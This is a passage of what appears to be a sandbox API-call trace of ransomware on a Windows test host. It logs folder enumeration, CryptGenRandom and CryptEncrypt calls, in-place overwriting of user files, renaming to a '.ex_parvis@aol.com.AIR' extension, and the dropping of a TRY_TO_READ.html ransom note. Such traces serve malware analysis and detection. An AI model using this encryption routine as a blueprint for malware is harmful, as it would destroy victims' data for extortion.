HALPmcxz\\AppData\\Roaming\\1Nrj.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1nrj.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.233] GetProcessHeap () returned 0x2e0000 [0167.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.234] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=83488) returned 1 [0167.234] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14620 [0167.234] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.234] GetProcessHeap () returned 0x2e0000 [0167.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.234] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.234] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.235] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.235] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.235] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x14620, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x14620, lpOverlapped=0x0) returned 1 [0167.236] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-83488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.236] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x14620, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x14620, lpOverlapped=0x0) returned 1 [0167.236] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.236] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.236] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav", dwFileAttributes=0x80) returned 1 [0167.237] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav") returned 70 [0167.237] GetProcessHeap () returned 0x2e0000 [0167.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x336dd8 [0167.237] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav" [0167.237] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0167.237] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-xsg9aghahjwrpsvgch.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-xsg9aghahjwrpsvgch.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.240] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-XSg9aghAHJwrPSVgcH.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-xsg9aghahjwrpsvgch.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.241] GetProcessHeap () returned 0x2e0000 [0167.241] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.241] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=40214) returned 1 [0167.241] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x9d16 [0167.241] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.241] GetProcessHeap () returned 0x2e0000 [0167.241] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.241] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.241] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.242] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.242] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x9d16, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x9d16, lpOverlapped=0x0) returned 1 [0167.242] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-40214, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.242] WriteFile (in: hFile=0x52c, lpBuffer=0x3bc130*, nNumberOfBytesToWrite=0x9d16, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bc130*, lpNumberOfBytesWritten=0x2acf9c8*=0x9d16, lpOverlapped=0x0) returned 1 [0167.244] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa48960, ftCreationTime.dwHighDateTime=0x1d4ce61, ftLastAccessTime.dwLowDateTime=0xb12f9b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb12f9b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1728 [0167.244] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530 [0167.248] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.248] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.249] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp", dwFileAttributes=0x80) returned 1 [0167.249] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp") returned 57 [0167.249] GetProcessHeap () returned 0x2e0000 [0167.249] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x31f5f0 [0167.249] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp" [0167.249] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp.12781717671972518758.ex_parvis@aol.com.AIR" [0167.249] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\ga8r.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\ga8r.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.253] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\Ga8r.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\ga8r.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530 [0167.253] GetProcessHeap () returned 0x2e0000 [0167.253] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.253] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=58488) returned 1 [0167.253] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe478 [0167.253] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.253] GetProcessHeap () returned 0x2e0000 [0167.253] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.253] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.253] WriteFile (in: hFile=0x530, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.254] WriteFile (in: hFile=0x530, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.254] WriteFile (in: hFile=0x530, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x530, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xe478, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xe478, lpOverlapped=0x0) returned 1 [0167.256] SetFilePointer (in: hFile=0x530, lDistanceToMove=-58488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.257] WriteFile (in: hFile=0x530, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xe478, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xe478, lpOverlapped=0x0) returned 1 [0167.257] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a3eab60, ftCreationTime.dwHighDateTime=0x1d4c688, ftLastAccessTime.dwLowDateTime=0xb12f9b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb12f9b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1768 [0167.257] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.257] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.257] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png", dwFileAttributes=0x80) returned 1 [0167.258] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png") returned 66 [0167.258] GetProcessHeap () returned 0x2e0000 [0167.258] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x31f5f0 [0167.258] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png" [0167.258] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png.12781717671972518758.ex_parvis@aol.com.AIR" [0167.258] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\zeau zy_w71.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\zeau zy_w71.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.261] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\ZEAU ZY_w71.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\zeau zy_w71.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534 [0167.261] GetProcessHeap () returned 0x2e0000 [0167.261] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.261] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=55878) returned 1 [0167.261] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xda46 [0167.261] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.261] GetProcessHeap () returned 0x2e0000 [0167.261] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.262] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.262] WriteFile (in: hFile=0x534, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.262] WriteFile (in: hFile=0x534, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.263] WriteFile (in: hFile=0x534, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x534, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xda46, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xda46, lpOverlapped=0x0) returned 1 [0167.263] SetFilePointer (in: hFile=0x534, lDistanceToMove=-55878, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.263] WriteFile (in: hFile=0x534, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xda46, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xda46, lpOverlapped=0x0) returned 1 [0167.265] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.265] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.265] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv", dwFileAttributes=0x80) returned 1 [0167.265] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv") returned 72 [0167.265] GetProcessHeap () returned 0x2e0000 [0167.265] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf6) returned 0x31f5f0 [0167.265] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv" [0167.265] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.266] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\jxyn719kww1tazzvh.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\jxyn719kww1tazzvh.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.269] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\JXyN719kWw1tazZvH.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\jxyn719kww1tazzvh.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534 [0167.269] GetProcessHeap () returned 0x2e0000 [0167.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.269] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=99356) returned 1 [0167.269] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1841c [0167.269] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.269] GetProcessHeap () returned 0x2e0000 [0167.269] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.269] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.270] WriteFile (in: hFile=0x534, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.270] WriteFile (in: hFile=0x534, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.270] WriteFile (in: hFile=0x534, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.271] ReadFile (in: hFile=0x534, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x1841c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x1841c, lpOverlapped=0x0) returned 1 [0167.273] SetFilePointer (in: hFile=0x534, lDistanceToMove=-99356, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.273] WriteFile (in: hFile=0x534, lpBuffer=0x3108470*, nNumberOfBytesToWrite=0x1841c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3108470*, lpNumberOfBytesWritten=0x2acf9c8*=0x1841c, lpOverlapped=0x0) returned 1 [0167.273] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc11032c0, ftCreationTime.dwHighDateTime=0x1d4c64e, 